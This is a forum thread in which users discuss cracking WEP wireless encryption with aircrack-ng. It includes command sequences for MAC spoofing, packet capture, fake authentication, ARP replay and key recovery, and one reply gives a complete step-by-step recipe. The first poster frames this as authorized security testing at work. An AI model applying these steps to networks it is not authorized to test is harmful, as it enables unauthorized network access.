Results 1 to 4 of 4

Thread: WEP Crack Aireplay-ng

  1. #1
    Just burned his ISO kiloraw's Avatar
    Join Date
    Jan 2010
    Location
    On the side, in the middle, compass points east
    Posts
    9

    Default WEP Crack Aireplay-ng

    First i must say, wonderful job on the vol. 4. I think going to Ubuntu to will be well worth it, sucks for the guru's right now, but like I said it will be worth it.

    As for my problem:
    Scenario:
    At work, trying to crack a AP WEP. I will have to do this alot more, since it will be my job to test the security of wireless AP, which will have WPA2. Trying to crack WEP now, for knowledge and seems logical. The AP has know clients, and the ESSID is not broadcasted. I decided to ask what was the AP's ESSID for my co-worker, so that I could troubleshoot, if it was a user error or not.

    Card: 3945 iwl

    airmon-ng
    airmon-ng stop (interface)
    ifconfig (interface) down
    macchanger --mac 00:11:22:33:44:55 (interface)
    airmon-ng start (interface)

    airodump-ng (interface)
    airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)


    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    The command above is were i get stuck, aircrack tutorial says to "Do not proceed to the next step until you have the fake authentication running correctly."

    The terminal comes back and states
    Sending Authentication Request (shared) [ACK]
    Authentication 1/2 successful
    Sending encrypted challenge
    Attack was unsuccessful
    Then gives me a list of reason's why it did not work.


    NEVERMIND this post....Figured it out.....You have to at least have prior data to crack WEP
    duh://forums.remote-exploit.org/wireless/6535-wep-cracking-no-clients-no-ssid.html
    I read the forum discussion really cleared up alot. I recommend to all future newbs(including myself), to really read the aircrack site.
    Just to make sure and please someone post if this is true
    "The tutorials are about the situation when you see no client :
    hxxp://www.aircrack-ng.org/doku.php?...ith_no_clients
    but to do the fragmentation you need the WEP encrypted data thus either it is from previous session or from a nonvisible client, as there is no data obtain from fakeauth. When you read any tutorial look at the MAC's in collected packets used to frag attack.
    LAN client can seIf you have no client connected ( wlan or lan ) you have no data to collect thus cannot attack the AP unless you have previously collected data.
    nd data through wireless when addressing wireless client"
    Last edited by kiloraw; 01-22-2010 at 09:32 PM. Reason: Figured out my own problem...

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: WEP Crack Aireplay-ng

    This is not a how-to or tutorial Please post in the correct section of the forums.

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: WEP Crack Aireplay-ng

    Well I do WEP like this
    Code:
        airmon-ng stop wlan0
        airmon-ng start wlan0
        "Ill be using mon0 (its now in monitor mode)"
    
        airodump-ng mon0 -w /tmp/WEP --channel (AP c hannel) --bssid (AP bssid)
    
    NEW CONSOLE
        aireplay-ng -1 0 -a bssid (AP bssid) mon0
    
    NEW CONSOLE
        aireplay-ng -3 -b (AP bssid) mon0
     
    Wait untill the number in newiest console is over 30000 (the second number)
     Then Stop all of these
    Then
     aircrack-ng /tmp/WEP-01.cap
    Here is a quide
    http://www.aircrack-ng.org/doku.php?...ith_no_clients

    Yes I use No clients WEP hack even if ther is clients
    Last edited by halfdone; 01-23-2010 at 12:15 PM.

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    27

    Default Re: WEP Crack Aireplay-ng

    You need fake auth with shared key...

    Shared key can be hooked when client connect to AP...
    To hook shared key u can use airodump-ng, and wait unti someone connect

    Then u have to fake auth

Similar Threads

  1. How to crack WPA on a cluster
    By MikeCa in forum BackTrack Howtos
    Replies: 12
    Last Post: 02-04-2011, 02:12 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •